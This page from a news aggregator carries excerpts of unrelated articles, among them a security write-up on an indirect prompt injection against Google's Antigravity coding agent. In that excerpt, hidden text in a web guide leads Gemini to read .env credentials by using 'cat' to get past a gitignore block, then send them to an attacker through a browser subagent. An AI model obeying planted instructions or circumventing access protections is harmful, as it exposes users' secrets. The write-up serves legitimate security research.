10 interesting stories served every morning and every evening.
Hi! I’m Eric Wastl. I make Advent of Code. I hope you like it! I also make lots of other things. I’m on Bluesky, Mastodon, and GitHub.
Advent of Code is an Advent calendar of small programming puzzles for a variety of skill levels that can be solved in any programming language you like. People use them as interview prep, company training, university coursework, practice problems, a speed contest, or to challenge each other.
You don’t need a computer science background to participate - just a little programming knowledge and some problem solving skills will get you pretty far. Nor do you need a fancy computer; every problem has a solution that completes in at most 15 seconds on ten-year-old hardware.
If you’d like to support Advent of Code, you can do so indirectly by helping to [Share] it with others or directly via AoC++.
If you get stuck, try your solution against the examples given in the puzzle; you should get the same answers. If not, re-read the description. Did you misunderstand something? Is your program doing something you don’t expect? After the examples work, if your answer still isn’t correct, build some test cases for which you can verify the answer by hand and see if those work with your program. Make sure you have the entire puzzle input. If you’re still stuck, maybe ask a friend for help, or come back to the puzzle later. You can also ask for hints in the subreddit.
Is there an easy way to select entire code blocks? You should be able to triple-click code blocks to select them. You’ll need JavaScript enabled.
#!/usr/bin/env perl
use warnings;
use strict;
print “You can test it out by ”;
print “triple-clicking this code.\n”;
How does authentication work? Advent of Code uses OAuth to confirm your identity through other services. When you log in, you only ever give your credentials to that service - never to Advent of Code. Then, the service you use tells the Advent of Code servers that you’re really you. In general, this reveals no information about you beyond what is already public; here are examples from Reddit and GitHub. Advent of Code will remember your unique ID, names, URL, and image from the service you use to authenticate.
Why was this puzzle so easy / hard? The difficulty and subject matter varies throughout each event. Very generally, the puzzles get more difficult over time, but your specific skillset will make each puzzle significantly easier or harder for you than someone else. Making puzzles is tricky.
Why do the puzzles unlock at midnight EST/UTC-5? Because that’s when I can consistently be available to make sure everything is working. I also have a family, a day job, and even need sleep occasionally. If you can’t participate at midnight, that’s not a problem; if you want to race, many people use private leaderboards to compete with people in their area.
I find the text on the site hard to read. Is there a high contrast mode? There is a high contrast alternate stylesheet. Firefox supports these by default (View -> Page Style -> High Contrast).
I have a puzzle idea! Can I send it to you? Please don’t. Because of legal issues like copyright and attribution, I don’t accept puzzle ideas, and I won’t even read your email if it looks like one just in case I use parts of it by accident.
Did I find a bug with a puzzle? Once a puzzle has been out for even an hour, many people have already solved it; after that point, bugs are very unlikely. Start by asking on the subreddit.
Should I try to get a fast solution time? Maybe. Solving puzzles is hard enough on its own, but trying for a fast time also requires many additional skills and a lot of practice; speed-solves often look nothing like code that would pass a code review. If that sounds interesting, go for it! However, you should do Advent of Code in a way that is useful to you, and so it is completely fine to choose an approach that meets your goals and ignore speed entirely.
Why did the number of days per event change? It takes a ton of my free time every year to run Advent of Code, and building the puzzles accounts for the majority of that time. After keeping a consistent schedule for ten years(!), I needed a change. The puzzles still start on December 1st so that the day numbers make sense (Day 1 = Dec 1), and puzzles come out every day (ending mid-December).
What happened to the global leaderboard? The global leaderboard was one of the largest sources of stress for me, for the infrastructure, and for many users. People took things too seriously, going way outside the spirit of the contest; some people even resorted to things like DDoS attacks. Many people incorrectly concluded that they were somehow worse programmers because their own times didn’t compare. What started as a fun feature in 2015 became an ever-growing problem, and so, after ten years of Advent of Code, I removed the global leaderboard. (However, I’ve made it so you can share a read-only view of your private leaderboard. Please don’t use this feature or data to create a “new” global leaderboard.)
While trying to get a fast time on a private leaderboard, may I use AI / watch streamers / check the solution threads / ask a friend for help / etc? If you are a member of any private leaderboards, you should ask the people that run them what their expectations are of their members. If you don’t agree with those expectations, you should find a new private leaderboard or start your own! Private leaderboards might have rules like maximum runtime, allowed programming language, what time you can first open the puzzle, what tools you can use, or whether you have to wear a silly hat while working.
Should I use AI to solve Advent of Code puzzles? No. If you send a friend to the gym on your behalf, would you expect to get stronger? Advent of Code puzzles are designed to be interesting for humans to solve - no consideration is made for whether AI can or cannot solve a puzzle. If you want practice prompting an AI, there are almost certainly better exercises elsewhere designed with that in mind.
Can I copy/redistribute part of Advent of Code? Please don’t. Advent of Code is free to use, not free to copy. If you’re posting a code repository somewhere, please don’t include parts of Advent of Code like the puzzle text or your inputs. If you’re making a website, please don’t make it look like Advent of Code or name it something similar.
...
Read the original on adventofcode.com »
Voyager 1 Is About to Reach One Light-day from Earth
Artist’s concept of the Voyager 1 spacecraft speeding through interstellar space. (Image: NASA / JPL‑Caltech)
After nearly 50 years in space, NASA’s Voyager 1 is about to hit a historic milestone. By November 15, 2026, it will be 16.1 billion miles (25.9 billion km) away, meaning a radio signal will take a full 24 hours—a full light-day—to reach it. For context, a light-year is the distance light travels in a year, about 5.88 trillion miles (9.46 trillion km), so one light-day is just a tiny fraction of that.
Launched in 1977 to explore Jupiter and Saturn, Voyager 1 entered interstellar space in 2012, becoming the most distant human-made object ever. Traveling at around 11 miles per second (17.7 km/s), it adds roughly 3.5 astronomical units (the distance from Earth to the Sun) each year. Even after decades in the harsh environment of space, Voyager 1 keeps sending data thanks to its radioisotope thermoelectric generators, which will last into the 2030s.
Communicating with Voyager 1 is slow. Commands now take about a day to arrive, with another day for confirmation. Compare that to the Moon (1.3 seconds), Mars (up to 4 minutes), and Pluto (nearly 7 hours). The probe’s distance makes every instruction a patient exercise in deep-space operations. To reach our closest star, Proxima Centauri, even at light speed, would take over four years—showing just how tiny a light-day is in cosmic terms.
The ‘Pale Blue Dot’ image of Earth, captured by Voyager 1. (Image: NASA / Public Domain)
Voyager 1’s journey is more than a record for distance. From its planetary flybys to the iconic ‘Pale Blue Dot’ image, it reminds us of the vast scale of the solar system and the incredible endurance of a spacecraft designed to keep exploring, even without return.
(function(w,q){w[q]=w[q]||[];w[q].push([“_mgc.load”])})(window,“_mgq”);
Also Read
Loading title…
(function(card) {
const CACHE_TTL = 3600000; // 1 hour in milliseconds
const link = card.querySelector(‘.also-read-link’).href;
const cacheKey = `alsoReadCache:${link}`;
const updateCard = (title, image) => {
card.querySelector(‘.also-read-title’).innerText = title;
card.querySelector(‘.also-read-image’).style.backgroundImage = `url(${image})`;
let cachedData;
try {
cachedData = localStorage.getItem(cacheKey);
if (cachedData) {
cachedData = JSON.parse(cachedData);
} catch(e) {
console.error(“Error parsing cache data:”, e);
cachedData = null;
if (cachedData && Date.now() - cachedData.timestamp < CACHE_TTL) {
updateCard(cachedData.title, cachedData.image);
return;
fetch(link)
.then(response => {
if (!response.ok) throw new Error(‘Network response was not ok’);
return response.text();
.then(html => {
const doc = new DOMParser().parseFromString(html, “text/html”);
const ogTitle = doc.querySelector(‘meta[property=“og:title”]’)?.content || “Read More”;
const ogImage = doc.querySelector(‘meta[property=“og:image”]’)?.content || “https://via.placeholder.com/300”;
localStorage.setItem(cacheKey, JSON.stringify({
title: ogTitle,
image: ogImage,
timestamp: Date.now()
updateCard(ogTitle, ogImage);
.catch(error => {
console.error(“Error fetching Open Graph data:”, error);
if (cachedData) {
updateCard(cachedData.title, cachedData.image);
})(document.currentScript.parentElement);
.also-read-card {
max-width: 600px;
width: 100%;
margin: 20px 0;
border: 1px solid #e0e0e0;
border-left: 8px solid #5170ff;
border-radius: 6px;
overflow: hidden;
background: #fff;
box-shadow: 0 1px 5px rgba(0,0,0,0.08);
transition: box-shadow 0.3s ease;
display: flex;
align-items: stretch;
.also-read-link {
display: flex;
align-items: stretch;
text-decoration: none;
color: inherit;
width: 100%;
.also-read-image {
width: 150px;
height: 100%;
flex-shrink: 0;
background-size: cover;
background-position: center;
/* Note: background-image transitions might not animate as expected */
.also-read-info {
padding: 15px;
flex-grow: 1;
display: flex;
flex-direction: column;
justify-content: center;
.also-read-label {
display: block;
font-size: 16px;
font-weight: 800;
letter-spacing: 1px;
color: #5170ff;
margin-bottom: 4.15px;
.also-read-title {
font-size: 18px;
font-weight: 500;
color: #333;
margin: 0;
line-height: 1.3;
display: block;
/* Responsive Styles */
@media screen and (max-width: 768px) {
.also-read-card {
max-width: 90%;
margin: 15px 0;
.also-read-image {
width: 120px;
.also-read-info {
...
Read the original on scienceclock.com »
In my recent analysis of YouTube’s information density I included the results from an advanced statistical analysis on the number of videos present on the home page, which projected that around May 2026 there would only be one lonely video on the home screen.
Amazingly, a disgruntled Googler leaked a recording of how YouTube’s PM
org handled the criticism as it sat at the
top of Hacker News for a whole day for some reason.
The net result is that after months of hard work by YouTube engineers, the other day I fired up YouTube on an Apple TV and was graced with this:
Let’s analyze this picture and count the number of videos on the home screen:
Unfortunately the YouTube PM org’s myopia is accelerating: with this data I now project that there will be zero videos on the homescreen around May of 2026 now, up from September.
Apparently Poe’s Law applies to Google PMs, satire is dead, and maybe our mandatory NeuraLinks are coming sooner than I thought.
...
Read the original on jayd.ml »
Ever since git init ten years ago, Zig has been hosted on GitHub. Unfortunately, when it sold out to Microsoft, the clock started ticking. “Please just give me 5 years before everything goes to shit,” I thought to myself. And here we are, 7 years later, living on borrowed time.
Putting aside GitHub’s relationship with ICE, it’s abundantly clear that the engineering excellence that created GitHub’s success is no longer driving it. Priorities and the engineering culture have rotted, leaving users inflicted with some kind of bloated, buggy JavaScript framework in the name of progress. Stuff that used to be snappy is now sluggish and often entirely broken.
Most importantly, Actions has inexcusable bugs while being completely neglected. After the CEO of GitHub said to “embrace AI or get out”, it seems the lackeys at Microsoft took the hint, because GitHub Actions started “vibe-scheduling”; choosing jobs to run seemingly at random. Combined with other bugs and inability to manually intervene, this causes our CI system to get so backed up that not even master branch commits get checked.
Rather than wasting donation money on more CI hardware to work around this crumbling infrastructure, we’ve opted to switch Git hosting providers instead.
As a bonus, we look forward to fewer violations (exhibit A, B, C) of our strict no LLM / no AI policy, which I believe are at least in part due to GitHub aggressively pushing the “file an issue with Copilot” feature in everyone’s face.
The only concern we have in leaving GitHub behind has to do with GitHub Sponsors. This product was key to Zig’s early fundraising success, and it remains a large portion of our revenue today. I can’t thank Devon Zuegel enough. She appeared like an angel from heaven and single-handedly made GitHub into a viable source of income for thousands of developers. Under her leadership, the future of GitHub Sponsors looked bright, but sadly for us, she, too, moved on to bigger and better things. Since she left, that product as well has been neglected and is already starting to decline.
Although GitHub Sponsors is a large fraction of Zig Software Foundation’s donation income, we consider it a liability. We humbly ask if you, reader, are currently donating through GitHub Sponsors, that you consider moving your recurring donation to Every.org, which is itself a non-profit organization.
As part of this, we are sunsetting the GitHub Sponsors perks. These perks are things like getting your name onto the home page, and getting your name into the release notes, based on how much you donate monthly. We are working with the folks at Every.org so that we can offer the equivalent perks through that platform.
Effective immediately, I have made ziglang/zig on GitHub read-only, and the canonical origin/master branch of the main Zig project repository is https://codeberg.org/ziglang/zig.git.
Thank you to the Forgejo contributors who helped us with our issues switching to the platform, as well as the Codeberg folks who worked with us on the migration - in particular Earl Warren, Otto, Gusted, and Mathieu Fenniak.
In the end, we opted for a simple strategy, sidestepping GitHub’s aggressive vendor lock-in: leave the existing issues open and unmigrated, but start counting issues at 30000 on Codeberg so that all issue numbers remain unambiguous. Let us please consider the GitHub issues that remain open as metaphorically “copy-on-write”. Please leave all your existing GitHub issues and pull requests alone. No need to move your stuff over to Codeberg unless you need to make edits, additional comments, or rebase. We’re still going to look at the already open pull requests and issues; don’t worry.
In this modern era of acquisitions, weak antitrust regulations, and platform capitalism leading to extreme concentrations of wealth, non-profits remain a bastion defending what remains of the commons.
...
Read the original on ziglang.org »
How to Get to Zero at Pioneer Works, Sep 12 - Dec 14, 2025. Review in the Art Newspaper, Oct 14. Offset at MediaLive: Data Rich, Dirt Poor at BMoCA, Sep 12 - Jan 11, 2026.
A browser extension for avoiding AI slop.
Download it for Chrome or Firefox.
This is a search tool that will only return content created before ChatGPT’s first public release on November 30, 2022.
Since the public release of ChatGTPT and other large language models, the internet is being increasingly polluted by AI generated text, images and video. This browser extension uses the Google search API to only return content published before Nov 30th, 2022 so you can be sure that it was written or produced by the human hand.
...
Read the original on tegabrain.com »
I’m done. I’m done arriving at hotels and discovering that they have removed the bathroom door. Something that should be as standard as having a bed, has been sacrificed in the name of “aesthetic”.
I get it, you can save on material costs and make the room feel bigger, but what about my dignity??? I can’t save that when you don’t include a bathroom door.
It’s why I’ve built this website, where I compiled hotels that are guaranteed to have bathroom doors, and hotels that need to work on privacy.
I’ve emailed hundreds of hotels and I asked them two things: do your doors close all the way, and are they made of glass? Everyone that says yes to their doors closing, and no to being made of glass has been sorted by price range and city for you to easily find places to stay that are guaranteed to have a bathroom door.
Quickly check to see if the hotel you’re thinking of booking has been reported as lacking in doors by a previous guest.
Finally, this passion project could not exist without people submitting hotels without bathroom doors for public shaming. If you’ve stayed at a doorless hotel send me an email with the hotel name to bringbackdoors@gmail.com, or send me a DM on Instagram with the hotel name and a photo of the doorless setup to be publicly posted.
Let’s name and shame these hotels to protect the dignity of future travelers.
...
Read the original on bringbackdoors.com »
An indirect prompt injection in an implementation blog can manipulate Antigravity to invoke a malicious browser subagent in order to steal credentials and sensitive code from a user’s IDE.
An indirect prompt injection in an implementation blog can manipulate Antigravity to invoke a malicious browser subagent in order to steal credentials and sensitive code from a user’s IDE.
Antigravity is Google’s new agentic code editor. In this article, we demonstrate how an indirect prompt injection can manipulate Gemini to invoke a malicious browser subagent in order to steal credentials and sensitive code from a user’s IDE.
Google’s approach is to include a disclaimer about the existing risks, which we address later in the article.
Let’s consider a use case in which a user would like to integrate Oracle ERP’s new Payer AI Agents into their application, and is going to use Antigravity to do so.
In this attack chain, we illustrate that a poisoned web source (an integration guide) can manipulate Gemini into (a) collecting sensitive credentials and code from the user’s workspace, and (b) exfiltrating that data by using a browser subagent to browse to a malicious site.
Note: Gemini is not supposed to have access to .env files in this scenario (with the default setting ‘Allow Gitignore Access > Off’). However, we show that Gemini bypasses its own setting to get access and subsequently exfiltrate that data.
The user provides Gemini with a reference implementation guide they found online for integrating Oracle ERP’s new AI Payer Agents feature.
Antigravity opens the referenced site and encounters the attacker’s prompt injection hidden in 1 point font.
Collect code snippets and credentials from the user’s codebase.
b. Create a dangerous URL using a domain that allows an attacker to capture network traffic logs and append credentials and code snippets to the request.
c. Activate a browser subagent to access the malicious URL, thus exfiltrating the data.
Gemini is manipulated by the attacker’s injection to exfiltrate confidential .env variables.
Gemini reads the prompt injection: Gemini ingests the prompt injection and is manipulated into believing that it must collect and submit data to a fictitious ‘tool’ to help the user understand the Oracle ERP integration.
b. Gemini gathers data to exfiltrate: Gemini begins to gather context to send to the fictitious tool. It reads the codebase and then attempts to access credentials stored in the .env file as per the attacker’s instructions.
c. Gemini bypasses the .gitignore file access protections: The user has followed a common practice of storing credentials in a .env file, and has the .env file listed in their .gitignore file. With the default configuration for Agent Gitignore Access, Gemini is prevented from reading the credential file.
This doesn’t stop Gemini. Gemini decides to work around this protection using the ‘cat’ terminal command to dump the file contents instead of using its built-in file reading capability that has been blocked.
D. Gemini constructs a URL with the user’s credentials and an attacker-monitored domain: Gemini builds a malicious URL per the prompt injection’s instructions by URL encoding the credentials and codebase snippets (e.g., replacing characters like spaces that would make a URL invalid), and appending it to a webhook.site domain that is monitored by the attacker.
E. Gemini exfiltrates the data via the browser subagent: Gemini invokes a browser subagent per the prompt injection, instructing the subagent to open the dangerous URL that contains the user’s credentials.
This step requires that the user has set up the browser tools feature. This is one of the flagship features of Antigravity, allowing Gemini to iterate on its designs by opening the application it is building in the browser.
Note: This attack chain showcases manipulation of the new Browser tools, but we found three additional data exfiltration vulnerabilities that did not rely on the Browser tools being enabled.
When Gemini creates a subagent instructed to browse to the malicious URL, the user may expect to be protected by the Browser URL Allowlist.
However, the default Allowlist provided with Antigravity includes ‘webhook.site’. Webhook.site allows anyone to create a URL where they can monitor requests to the URL.
So, the subagent completes the task.
3. When the malicious URL is opened by the browser subagent, the credentials and code stored URL are logged to the webhook.site address controlled by the attacker. Now, the attacker can read the credentials and code.
During Antigravity’s onboarding, the user is prompted to accept the default recommended settings shown below.
These are the settings that, amongst other things, control when Gemini requests human approval. During the course of this attack demonstration, we clicked “next”, accepting these default settings.
This configuration allows Gemini to determine when it is necessary to request a human review for Gemini’s plans.
This configuration allows Gemini to determine when it is necessary to request a human review for commands Gemini will execute.
One might note that users operating Antigravity have the option to watch the chat as agents work, and could plausibly identify the malicious activity and stop it.
However, a key aspect of Antigravity is the ‘Agent Manager’ interface. This interface allows users to run multiple agents simultaneously and check in on the different agents at their leisure.
Under this model, it is expected that the majority of agents running at any given time will be running in the background without the user’s direct attention. This makes it highly plausible that an agent is not caught and stopped before it performs a malicious action as a result of encountering a prompt injection.
A lot of AI companies are opting for this disclaimer rather than mitigating the core issues. Here is the warning users are shown when they first open Antigravity:
Given that (1) the Agent Manager is a star feature allowing multiple agents to run at once without active supervision and (2) the recommended human-in-the-loop settings allow the agent to choose when to bring a human in to review commands, we find it extremely implausible that users will review every agent action and abstain from operating on sensitive data. Nevertheless, as Google has indicated that they are already aware of data exfiltration risks exemplified by our research, we did not undertake responsible disclosure.
...
Read the original on www.promptarmor.com »
More than a decade ago, when I was applying to graduate school, I went through a period of deep uncertainty. I had tried the previous year and hadn’t gotten in anywhere. I wanted to try again, but I had a lot going against me.
I’d spent most of my undergrad building a student job-portal startup and hadn’t balanced it well with academics. My GPA needed explaining. My GMAT score was just okay. I didn’t come from a big-brand employer. And there was no shortage of people with similar or stronger profiles applying to the same schools.
Even though I had learned a few things from the first round, the second attempt was still difficult. There were multiple points after I submitted applications where I lost hope.
But during that stretch, a friend and colleague kept repeating one line to me:
“All it takes is for one to work out.”
He’d say it every time I spiraled. And as much as it made me smile, a big part of me didn’t fully believe it. Still, it became a little maxim between us. And eventually, he was right — that one did work out. And it changed my life.
I’ve thought about that framing so many times since then.
You don’t need every job to choose you. You just need the one that’s the right fit.
You don’t need every house to accept your offer. You just need the one that feels like home.
You don’t need every person to want to build a life with you. You just need the one.
You don’t need ten universities to say yes. You just need the one that opens the right door.
These processes — college admissions, job searches, home buying, finding a partner — can be emotionally brutal. They can get you down in ways that feel personal. But in those moments, that truth can be grounding.
All it takes is for one to work out.
And that one is all you need.
...
Read the original on alearningaday.blog »
OpenAI is now internally testing ‘ads’ inside ChatGPT that could redefine the web economy.
Up until now, the ChatGPT experience has been completely free.
While there are premium plans and models, you don’t see GPT sell you products or show ads. On the other hand, Google Search has ads that influence your buying behaviour.
As spotted by Tibor on X, ChatGPT Android app 1.2025.329 beta includes new references to an “ads feature” with “bazaar content”, “search ad” and “search ads carousel.”
This move could disrupt the web economy, as what most people don’t understand is that GPT likely knows more about users than Google.
For example, OpenAI could create personalised ads on ChatGPT that promote products that you really want to buy. It might also sneak in ads in the search ads, similar to Google Search ads.
The leak suggests that ads will initially be limited to the search experience only, but this may change in the future.
ChatGPT has roughly 800 million people using it every week, up from 100 million weekly users in November 2023 and about 300 million weekly users in late 2024.
An OpenAI-backed study estimated 700 million users sending 18 billion messages per week by July 2025, which lines up with this growth, and other analysts now peg traffic at around 5–6 billion visits per month.
GPT handles about 2.5 billion prompts a day, and India has become the single biggest user base, ahead of the US.
ChatGPT has everything it needs for ads to succeed. What do you think?
...
Read the original on www.bleepingcomputer.com »
To add this web app to your iOS home screen tap the share button and select "Add to the Home Screen".
10HN is also available as an iOS App
If you visit 10HN only rarely, check out the the best articles from the past week.
If you like 10HN please leave feedback and share
Visit pancik.com for more.